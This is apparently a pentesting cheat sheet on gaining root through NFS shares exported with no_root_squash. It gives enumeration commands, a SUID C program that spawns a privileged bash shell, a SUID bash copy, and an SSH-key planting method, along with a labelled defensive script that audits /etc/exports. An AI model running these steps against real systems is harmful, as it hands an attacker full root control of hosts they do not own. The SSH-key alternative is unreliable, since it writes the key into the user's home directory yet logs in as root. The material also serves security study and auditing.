Overview

NFS (Network File System) exports configured with no_root_squash let a remote root user create files on the share as root. If the exported directory is also accessible on the target (and is not mounted nosuid), any root-owned SUID file created there executes as root.

Enumerate NFS Shares

From Target

cat /etc/exports
showmount -e localhost

From Attacker

showmount -e TARGET_IP
nmap -sV -p 111,2049 TARGET_IP
nmap --script "nfs*" TARGET_IP

Look For

/home/user  *(rw,no_root_squash)
/tmp        *(rw,no_root_squash)

no_root_squash means remote root keeps root privileges on the share.
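
The same check from the defender's side, as an added example that is not part of the original page: it reads an exports file and lists every client entry that sets no_root_squash. It assumes one export per line with unquoted paths; the function names, the sample entries and the HIGH/MEDIUM labels are constructed for illustration.

```sh
#!/bin/sh
# Added example: list export entries that set no_root_squash.
# Output columns (tab-separated): path, client, severity.
# Severity labels are this example's own: HIGH = writable and open to any
# host, MEDIUM = any other no_root_squash entry.
# Assumes one export per line and unquoted paths.
audit_exports() {
    awk '
    NF == 0 || $1 ~ /^#/ { next }            # skip blank lines and comments
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            if ($i ~ /^#/) break             # trailing comment
            client = $i; opts = ""
            if (match($i, /\(.*\)$/)) {      # split "client(opt,opt)"
                client = substr($i, 1, RSTART - 1)
                opts = substr($i, RSTART + 1, RLENGTH - 2)
            }
            if (client == "") client = "*"   # bare "(opts)" means any host
            if (("," opts ",") !~ /,no_root_squash,/) continue
            sev = "MEDIUM"
            if (("," opts ",") ~ /,rw,/ && client == "*") sev = "HIGH"
            printf "%s\t%s\t%s\n", path, client, sev
        }
    }' "${1:--}"
}

# Constructed sample in /etc/exports format (the first two entries match
# the ones shown above; the rest are made up for the example).
sample_exports() {
    cat <<'EOF'
# constructed sample, not from a real host
/home/user   *(rw,no_root_squash)
/tmp         *(rw,no_root_squash)
/srv/build   10.0.0.5(ro,no_root_squash)
/srv/data    10.0.0.0/24(rw,root_squash)
/srv/mixed   10.0.0.5(rw) 10.0.0.9(rw,no_root_squash)
/srv/pub     *(ro)
EOF
}

sample_exports | audit_exports
```

To audit a real server, call `audit_exports /etc/exports`; an empty result means no entry in that file sets no_root_squash.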

Exploit

Step 1 — Mount Share on Attacker (as root)

mkdir /tmp/nfs
mount -t nfs TARGET_IP:/home/user /tmp/nfs

Step 2 — Create SUID Binary

#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}

gcc shell.c -o /tmp/nfs/shell
chmod +s /tmp/nfs/shell

Step 3 — Execute on Target

/home/user/shell
# root shell

Alternative — Copy SUID bash

cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash

On target:

/home/user/rootbash -p

Alternative — Write SSH Key

mkdir /tmp/nfs/.ssh
ssh-keygen -t ed25519 -f /tmp/key -N ""
cp /tmp/key.pub /tmp/nfs/.ssh/authorized_keys
chmod 700 /tmp/nfs/.ssh
chmod 600 /tmp/nfs/.ssh/authorized_keys
ssh -i /tmp/key root@TARGET_IP

root_squash vs no_root_squash

| Setting | Behavior |
| --- | --- |
| root_squash (default) | Remote root mapped to nfsnobody — cannot create root-owned SUID files |
| no_root_squash | Remote root stays root — full control |
| no_all_squash | Non-root users keep their UID |